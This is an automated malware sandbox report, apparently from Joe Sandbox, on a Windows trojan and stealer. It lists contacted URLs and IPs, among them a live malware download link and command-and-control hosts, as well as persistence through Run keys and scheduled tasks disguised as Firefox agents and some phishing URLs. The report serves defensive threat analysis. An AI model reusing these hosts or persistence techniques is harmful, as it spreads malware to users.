https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id10Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id8Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id22LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/us/when-does-daylight-saving-time-end-2023-here-s-when-to-set-your-cl	explorer.exe, 00000001.00000000.1676755416.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000001.00000000.1679072741.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1677857502.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.1677485543.0000000007F40000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
http://tempuri.org/Entity/Id22Responsey	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://dc.services.visualstudio.com/v2/track	907.exe, 00000006.00000000.1906824742.0000000000DD1000.00000002.00000001.01000000.00000006.sdmp	false		high
http://tempuri.org/Entity/Id19LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id7LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id11LR	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/rm/CreateSequenceResponse	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false		high
http://5.42.64.35/syncUpd.exeSystem32	InstallSetup8.exe, 0000000D.00000002.3184690905.000000000072E000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/lifestyle/travel/i-ve-worked-at-a-campsite-for-5-years-these-are-the-15-mi	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.clocx.net	etopt.exe, 0000001A.00000003.2437260066.000000000270C000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id13Response	RegSvcs.exe, 00000008.00000002.3200026588.0000000002BF1000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://chincenterblandwka.pw/=$	RegAsm.exe, 00000015.00000002.2357230523.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://apis.map.qq.com/ws/location/v1/ip?key=3BFBZ-ZKD3X-LW54A-ZT76D-E7AHO-4RBD5&output=jsonstatusr	etopt.exe, 0000001A.00000002.2796162380.0000000004E69000.00000002.00001000.00020000.00000000.sdmp, etopt.exe, 0000001A.00000002.2798326413.0000000004F30000.00000004.00000020.00020000.00000000.sdmp	false		high
https://assets.msn.com/staticsb/statics/latest/traffic/Notification/desktop/svg/RoadHazard.svg	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu-dark	explorer.exe, 00000001.00000000.1676755416.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
172.67.176.11	chincenterblandwka.pw	United States	13335	CLOUDFLARENETUS	true
91.92.254.7	unknown	Bulgaria	34368	THEZONEBG	false
52.217.163.105	s3-w.us-east-1.amazonaws.com	United States	16509	AMAZON-02US	false
38.6.193.13	unknown	United States	174	COGENT-174US	false
185.215.113.68	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
91.92.250.73	unknown	Bulgaria	34368	THEZONEBG	false
5.42.65.125	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
45.42.45.36	unknown	United States	62941	VARIANCEM-ASUS	false
194.15.112.248	oshi.at	Ukraine	213354	INTERNATIONAL-HOSTING-SOLUTIONS-ASEUDCrouteGB	false
104.192.141.1	bitbucket.org	United States	16509	AMAZON-02US	false
5.42.65.31	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
195.20.16.103	unknown	Finland	42297	EITADAT-ASFI	true
158.160.130.138	host-host-file8.com	Venezuela	721	DNIC-ASBLK-00721-00726US	true
185.196.9.220	unknown	Switzerland	42624	SIMPLECARRIERCH	false
173.231.16.77	api4.ipify.org	United States	18450	WEBNXUS	false
5.42.66.58	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	true
104.21.24.252	soupinterestoe.fun	United States	13335	CLOUDFLARENETUS	true
5.42.64.35	unknown	Russian Federation	39493	RU-KSTVKolomnaGroupofcompaniesGuarantee-tvRU	false
192.186.7.211	unknown	United States	395776	FEDERAL-ONLINE-GROUP-LLCUS	false

General Information

Joe Sandbox version:	38.0.0 Ammolite
Analysis ID:	1367440
Start date and time:	2023-12-27 17:56:07 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 14m 11s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	48
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	W73PCbSH71.exe renamed because original name is a hash value
Original Sample Name:	c8159fa89113ec6fc180ccb76ff3bdc6.exe
Detection:	MAL
Classification:	mal100.spre.troj.adwa.spyw.expl.evad.winEXE@81/432@16/19
EGA Information:	Successful, ratio: 78.6%
HCA Information:	Successful, ratio: 94% Number of executed functions: 161 Number of non-executed functions: 263
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, Conhost.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 3613.exe, PID 4420 because it is empty
Execution Graph export aborted for target InstallSetup8.exe, PID 4048 because there are no executed function
Execution Graph export aborted for target etopt.exe, PID 6064 because there are no executed function
HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryAttributesFile calls found.
Report size getting too big, too many NtQueryDirectoryFile calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtQueryVolumeInformationFile calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
16:57:17	Task Scheduler	Run new task: Firefox Default Browser Agent 2F0EAE4DE52D2068 path: C:\Users\user\AppData\Roaming\jfhrjta
16:57:57	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Service Scheduler "C:\ProgramData\xQfUeydaBrjuHptx.exe"
16:58:04	Task Scheduler	Run new task: Firefox Default Browser Agent FAC2A03E90809A00 path: C:\Users\user\AppData\Roaming\vghrjta
16:58:07	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Service Scheduler "C:\ProgramData\xQfUeydaBrjuHptx.exe"
16:58:19	Autostart	Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe
16:58:49	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run 9234 C:\Users\user\AppData\Local\Temp\9234.exe
16:58:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run 9234 C:\Users\user\AppData\Local\Temp\9234.exe
17:57:00	API Interceptor	33280x Sleep call for process: explorer.exe modified
17:57:21	API Interceptor	1x Sleep call for process: 907.exe modified
17:57:36	API Interceptor	5x Sleep call for process: RegAsm.exe modified
17:57:36	API Interceptor	6x Sleep call for process: 31839b57a4f11171d6abc8bbc4451ee4.exe modified
17:57:41	API Interceptor	1x Sleep call for process: 4BEF.exe modified
17:57:50	API Interceptor	17x Sleep call for process: RegSvcs.exe modified
17:58:03	API Interceptor	15x Sleep call for process: ABF7.exe modified
17:58:09	API Interceptor	25x Sleep call for process: 7D14.exe modified
17:58:19	API Interceptor	31x Sleep call for process: A203.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
172.67.176.11	7yCti1JQXn.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	EdRzQIfoXb.exe	Get hash	malicious	Babuk, Clipboard Hijacker, Djvu, LummaC Stealer, PureLog Stealer, RedLine, SmokeLoader	Browse
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse
	Setup.exe	Get hash	malicious	Unknown	Browse
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse
	aif31Spjyi.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse
	XaXFhr265w.exe	Get hash	malicious	Unknown	Browse
	zzfenRCj9M.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse
	uetfu6ZLWZ.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse
	16GAuqLUFK.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse
	file.exe	Get hash	malicious	Unknown	Browse
91.92.254.7	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	SSmamWOS7L.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	PxYYzLeAPi.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	ACTCsxhga8.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	hyLlq17U4C.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	aif31Spjyi.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	zzfenRCj9M.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	uetfu6ZLWZ.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	1OChQfMJUK.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	16GAuqLUFK.exe	Get hash	malicious	Glupteba, RedLine, SmokeLoader, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=two&s=ab
	file.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=three&s=ab
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=three&s=ab
	U1MiP25NrU.exe	Get hash	malicious	Amadey, Glupteba, LummaC Stealer, RedLine, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=eight&s=ab
	7C3J00l6fa.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	8RYB9RzQA5.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab
	tx2WEPjzLS.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Socks5Systemz, Stealc, zgRAT	Browse	91.92.254.7/scripts/plus.php?ip=102.129.152.212&substr=nine&s=ab

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
bitbucket.org	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.192.141.1
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	104.192.141.1
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	104.192.141.1
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	104.192.141.1
	5kE9Ks1Yp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	MdK7YlTyhS.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	fY2HAd4r9I.exe	Get hash	malicious	Amadey, Easy Stealer, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	104.192.141.1
	ABHRDIL8cm.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	qmJ59GSETt.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	Xu9HaBSiIJ.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	QGShkK4MMl.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	104.192.141.1
	sEWX47oH4X.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	zXGs3AGQSn.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	0dzdkSIbp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	1vZX9U5Diw.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	104.192.141.1
	QrHAH5Dt6l.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	zFZmNLWVfM.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
	zB6UeFurbf.exe	Get hash	malicious	Amadey, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	104.192.141.1
s3-w.us-east-1.amazonaws.com	https://2fa.com-token-auth.com/XUWt4dVMzUjJiV3Q1ZGxkaFMyRmpjbU4yTHpNMkwxUTFSMEZ0YzJ4UWF6WXZRVlZXUW1KQ2FYZzBhalZFWTBVNGFGaEJjR3R0Y1ZCSEsySkViVzk0TUZsWE9IZE1UR1pOTUhST2NTOHJSM0V2VWpOVVNWUnlVRmcxTUZsa1NXcFpOVlZLUWxkVVdrUnRhbk5tVldOYWJtUnhkbXBvUjJoamVtdHdTVTR2Wm1ndlR6TlhNVmR6ZFRBdlRrVnJRV0V4UldsM04yRXlkRFpaV25sbFRFOHJRVTFsZFdsRFFYWTRNMWRuTmtSSVRtVjVNamh2UkdwRFZ6ZG1NbU5aUlNzckxTMTNjVFUxYzI5NWJtNUROa3BUTHpWMVQwTnBiVWxCUFQwPS0tNDMyMGM0Nzc0MmFjMDdlNmJjZTY4NGM4YzcyZTJhYzY4MmEyMWFmNg==?cid=1855985826	Get hash	malicious	Unknown	Browse	52.217.233.25
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	3.5.3.112
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	54.231.130.33
	o9B7y2ZGmy.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, Vidar	Browse	52.217.164.41
	SecuriteInfo.com.Win64.PWSX-gen.7949.23910.exe	Get hash	malicious	Glupteba	Browse	52.217.48.60
	5kE9Ks1Yp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.69.73
	MdK7YlTyhS.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	3.5.28.135
	https://pub-2dc4e3b2817c45f8af7172240c8fb675.r2.dev/newweb.html#nobody@fuckoff.org	Get hash	malicious	Unknown	Browse	54.231.170.65
	fY2HAd4r9I.exe	Get hash	malicious	Amadey, Easy Stealer, LummaC Stealer, RHADAMANTHYS, RedLine, SmokeLoader, zgRAT	Browse	52.216.41.25
	file.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Socks5Systemz	Browse	52.217.73.244
	https://www.joesandbox.com/analysis/1366229	Get hash	malicious	Unknown	Browse	52.217.197.33
	ABHRDIL8cm.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.99.153
	qmJ59GSETt.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	16.182.37.105
	Xu9HaBSiIJ.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.217.224.193
	QGShkK4MMl.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	52.217.171.65
	sEWX47oH4X.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	3.5.19.145
	zXGs3AGQSn.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.217.229.17
	0dzdkSIbp0.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	52.216.90.20
	NFcNdFBTH9.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, SmokeLoader, zgRAT	Browse	54.231.236.201
	1vZX9U5Diw.exe	Get hash	malicious	Amadey, LummaC Stealer, RedLine, RisePro Stealer, SmokeLoader, Vidar, zgRAT	Browse	52.217.92.172

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
THEZONEBG	1RS8d3yXB1.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc	Browse	91.92.254.7
	Dekont_00924889_pdf.exe	Get hash	malicious	Remcos	Browse	91.92.252.36
	dekont_0092488_pdf.exe	Get hash	malicious	Remcos	Browse	91.92.252.36
	MEXTRAXT.exe	Get hash	malicious	RisePro Stealer, SmokeLoader	Browse	91.92.249.253
	7uu2Bn48.exe	Get hash	malicious	Glupteba, LummaC Stealer, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7
	SSmamWOS7L.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	SecuriteInfo.com.Trojan.DownLoader46.44277.27482.3211.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	xksYucKYRR.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc, Vidar	Browse	91.92.254.7
	SecuriteInfo.com.Win32.CrypterX-gen.26527.9245.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	PxYYzLeAPi.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	SecuriteInfo.com.Win32.CrypterX-gen.28912.11851.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	ACTCsxhga8.exe	Get hash	malicious	Glupteba, SmokeLoader, Stealc	Browse	91.92.254.7
	file.bat	Get hash	malicious	Remcos	Browse	91.92.244.118
	hyLlq17U4C.exe	Get hash	malicious	Stealc, Vidar	Browse	91.92.254.7
	7pm0Cc79.exe	Get hash	malicious	Glupteba, Petite Virus, RedLine, SmokeLoader, Stealc, zgRAT	Browse	91.92.254.7
	SecuriteInfo.com.Trojan.DownLoader46.44014.21306.18900.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	Max.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	aif31Spjyi.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7
	SecuriteInfo.com.Win32.TrojanX-gen.20502.12077.exe	Get hash	malicious	Snake Keylogger	Browse	91.92.253.149
	zzfenRCj9M.exe	Get hash	malicious	Glupteba, SmokeLoader	Browse	91.92.254.7
CLOUDFLARENETUS	https://bidsinvitaion.cfd	Get hash	malicious	Unknown	Browse	172.67.171.133
	https://199.204.248.121/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://199.204.248.121/	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://filetransfer.io/data-package/9bB74mdj/download	Get hash	malicious	Unknown	Browse	172.67.200.96
	https://docs.google.com/document/d/e/2PACX-1vRnddumlD2iOUDSIlQHcDdTaCok30Rs_HpT3qUzKanHkvNWyTlg1EPLcwWPbMUW5HHAd6h0Wuhke9_K/pub	Get hash	malicious	Unknown	Browse	172.67.148.196
	SecuriteInfo.com.Win32.TrojanX-gen.17400.24243.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	https://2fa.com-token-auth.com/XUWt4dVMzUjJiV3Q1ZGxkaFMyRmpjbU4yTHpNMkwxUTFSMEZ0YzJ4UWF6WXZRVlZXUW1KQ2FYZzBhalZFWTBVNGFGaEJjR3R0Y1ZCSEsySkViVzk0TUZsWE9IZE1UR1pOTUhST2NTOHJSM0V2VWpOVVNWUnlVRmcxTUZsa1NXcFpOVlZLUWxkVVdrUnRhbk5tVldOYWJtUnhkbXBvUjJoamVtdHdTVTR2Wm1ndlR6TlhNVmR6ZFRBdlRrVnJRV0V4UldsM04yRXlkRFpaV25sbFRFOHJRVTFsZFdsRFFYWTRNMWRuTmtSSVRtVjVNamh2UkdwRFZ6ZG1NbU5aUlNzckxTMTNjVFUxYzI5NWJtNUROa3BUTHpWMVQwTnBiVWxCUFQwPS0tNDMyMGM0Nzc0MmFjMDdlNmJjZTY4NGM4YzcyZTJhYzY4MmEyMWFmNg==?cid=1855985826	Get hash	malicious	Unknown	Browse	1.1.1.1
	lumma.exe	Get hash	malicious	LummaC	Browse	104.21.64.47
	lumma.exe	Get hash	malicious	LummaC	Browse	104.21.64.47
	http://docusigningonlines.com	Get hash	malicious	Unknown	Browse	172.67.197.136
	http://www.m9c.net	Get hash	malicious	Unknown	Browse	172.64.151.101
	https://fastprintapp.com/lp1?channel=hud-gdn&tracking_id=142&oid=142&affid=1025&source_id=google&sub1=142imall&gclid=EAIaIQobChMI5Lzv2NSvgwMVXaOmBB3WUQkTEAEYASAAEgI9zPD_BwE	Get hash	malicious	Unknown	Browse	104.17.25.14
	z47orderdetails.scr.exe	Get hash	malicious	AgentTesla	Browse	162.159.136.232
	https://objectstorage.uk-london-1.oraclecloud.com/p/Dm-uuqxFryfb2kHYlg6r3rW1cYSu8I-BC6FXdHfEP7HuVx9YK9hXt8rQkIgLTkr0/n/lriykiioypwm/b/BKR_VDR_CUST_DATA_BUC/o/8840396_VTRA-0013.zip	Get hash	malicious	Unknown	Browse	1.1.1.1
	http://www.tfsilesia.pl	Get hash	malicious	Unknown	Browse	104.17.24.14
	1RS8d3yXB1.exe	Get hash	malicious	Glupteba, Petite Virus, SmokeLoader, Stealc	Browse	23.227.38.32
	paymentconfirmation.js	Get hash	malicious	Redline Clipper	Browse	172.67.215.45
	https://exchange.xforce.ibmcloud.com/url/22.hosted-by.198xd.com	Get hash	malicious	Xmrig	Browse	104.20.23.24
	https://ccefwg7oh2-qbphfvta.loginform.net/?d=W-mP8m4Ny_zWpcTrRG68A	Get hash	malicious	Unknown	Browse	104.16.124.96
	http://raymond.builder.hemsida24.se/	Get hash	malicious	Unknown	Browse	1.1.1.1

Process:	C:\Users\user\AppData\Local\Temp\etopt.exe
File Type:	SQLite 3.x database, last written using SQLite version 3008011, page size 1024, file counter 525, database pages 107, 1st free page 81, free pages 2, cookie 0x12, schema 4, UTF-16 little endian, version-valid-for 525
Category:	dropped
Size (bytes):	109568
Entropy (8bit):	4.183102851563776
Encrypted:	false
SSDEEP:	768:xb7b7gKrg9IA2cNt2hLnKzBFTQnQoRtn4+bszpqQgQdDWe7pdDWevd5ZtTnY0/1i:4IFCQnQo7ySQx9pxrzfYaY
MD5:	EB9430403ADB45EFAF19E3EBEB673CBC
SHA1:	634DE40972939A7CFA56A98446C3C0405074B9BB
SHA-256:	DDBFF3AC5FF01DC970C80DD42D6F240483F251A0B31FA0AD4C9C405410C8E474
SHA-512:	7276A18A41B483E8D25691DA37DC53B65004E2496766B41DE1D693C43878598249315F8E5CD32E82927693EFA78C8FE3BF675B73A501C670AAA4B89812855287
Malicious:	false
Reputation:	unknown
